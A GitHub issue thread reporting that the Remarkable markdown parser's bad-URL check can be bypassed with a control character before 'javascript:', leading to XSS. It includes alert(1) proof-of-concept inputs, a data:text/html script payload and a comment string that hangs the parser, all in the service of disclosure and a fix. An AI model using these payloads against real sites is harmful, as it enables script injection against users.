Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

[Security] bad url bypass, could lead to XSS #332

Closed
trichimtrich opened this issue May 13, 2019 · 6 comments · Fixed by #334
Closed

[Security] bad url bypass, could lead to XSS #332

trichimtrich opened this issue May 13, 2019 · 6 comments · Fixed by #334

Comments

@trichimtrich
Copy link

Hi, check out this reported issue
#227

Im able to bypass the bad url check, implemented here
https://github.com/jonschlinkert/remarkable/blob/master/lib/parser_inline.js#L146

var Remarkable = require('remarkable');
var md = new Remarkable();

console.log(md.render(`# Remarkable rulezz!
[click me](\x0ejavascript:alert(1))
`));

It will generate output like this

<h1>Remarkable rulezz!</h1>
<p><a href=" javascript:alert(1)">click me</a></p>

Which could pop up an alert when user clicks into it.

Fix: maybe we can strip unprintable character around the url scheme?

@jonschlinkert
Copy link
Owner

jonschlinkert commented May 13, 2019

Thanks for the issue. Would you want to do a pull request?

@reintroducing
Copy link

reintroducing commented May 29, 2019

This triggered a GitHub security vulnerability notification in one of my repos today. Any chance that this can get fixed and republished?

@rikoe
Copy link

rikoe commented Jul 16, 2019

Is there any update on this high severity vulnerability? It would be great if this could be fixed ASAP.

image

@sundowndev
Copy link

Still not fixed. But why this snippet does not produce the expected issue ?

Tried using @trichimtrich's code and #227. None of them work on Firefox.

# Remarkable rulezz!

[click me](\x0ejavascript:alert(1))

[xss](data:text/html,<script>alert(1)</script>)

@rikoe
Copy link

rikoe commented Jul 17, 2019

The xss one works for me in Safari but not in Chrome. There is likely something in Chrome preventing such an attack?

image

The first one doesn't work for me on the demo page, because it is turned into the URL https://jonschlinkert.github.io/x0ejavascript:alert(1) which then returns a 404 (not sure why). I am therefore not sure if it can be proved through the demo page...

@rikoe
Copy link

rikoe commented Jul 17, 2019

@sundowndev there are two CVEs open currently:

Both these issues were raised based on calling md.render from JavaScript, so that should be the way to test it I think.

I think I was able to replicate both these issues by using:

# Remarkable rulezz!
[xss](data:text/html,<script>alert(1)</script>)
<a>z</a><!--aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa--->

The comment line makes the demo page hang if I turn the "html" flag on.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging a pull request may close this issue.

5 participants